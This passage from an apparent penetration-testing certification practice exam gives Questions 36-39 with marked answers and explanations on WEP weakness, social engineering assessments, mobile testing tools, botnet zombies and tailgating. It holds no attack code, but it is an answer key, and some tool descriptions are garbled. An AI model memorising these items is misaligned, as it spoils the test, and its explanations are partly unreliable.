OBJ-6.1: Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. It is the oldest form of wireless security and the weakest form. WEP can be cracked with brute force techniques in less than 5 minutes with a normal end-user computer.

Question 36

What technique is most effective in determining whether or not increasing end-user security training would benefit the organization during your technical assessment of their network?

A. Vulnerability scanning

B. Social engineering

C. Application security testing

D. Network sniffing

Answer 36

B. Social engineering
(Correct)

Explanation

OBJ-4.2: Social engineering refers to the psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, utilizing social engineering techniques such as phishing or pharming can help you determine if additional end-user security training should be included in the organization. The other three options focus solely on technical controls. Therefore adding end-user training would not affect these technology options.

Question 37

You are working as part of a penetration testing team targeting Dion Training’s mobile device software. Which of the following tools would NOT be helpful while trying to exploit their mobile applications?

A. Androzer

B. Dirbuster

C.APKX

D. APK studio

Answer 37

B. Dirbuster
(Correct)

Explanation

OBJ-7.1: Dirbuster is a brute force tool included with Kali Linux that exposes directories and file names on web and application servers. Androzer is a security testing framework for Android apps and devices. APKX (Android Package Kit) is a Python wrapper for dex converters and Java decompilers included in the OWASP Mobile Testing Guide. APK Studio is a cross-platform IDE for reverse engineering Android applications.

Question 38

You are troubleshooting a user’s workstation that is operating extremely slowly. You open the Task Manager and see that only Microsoft Word is currently running, but the CPU and network utilization is consistently running between 95-100%. Which of the following is MOST likely causing this issue?

A. The computer is the victim of a DoS attack

B. The network’s firewall is blocking outbound traffic

C. The computer has become a zombie

D. The application is not compatible with this OS

Answer 38

C. The computer has become a zombie

Explanation
OBJ-4.3: The workstation has most likely become a zombie. A zombie is any workstation running unauthorized software that directs the device to participate in a DDoS attack as part of a larger botnet. A botnet is a network of computers that have been compromised by a Trojan, rootkit, or worm malware. This workstation would then attempt to flood the victim’s computer with requests over the network. These requests would require CPU and network resources to make, causing the utilization to rise to 95-100% resource utilization.

Question 39

You are working as a server administrator at Dion Training. You unlock the server room door using your proximity badge and walk through the door. Before the door shuts, another person walks in behind you. What social engineering technique did this person utilize?

A. Impersonation

B. Spoofing

C. Tailgating

D. Shoulder surfing

Answer 39

C. Tailgating
(Correct)

Explanation
OBJ-4.2: Tailgating (or piggybacking) is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. This might be done without the target’s knowledge or might be a means for an insider to allow access to someone without recording it in the building’s entry log. Another technique is to persuade someone to hold a door open for them.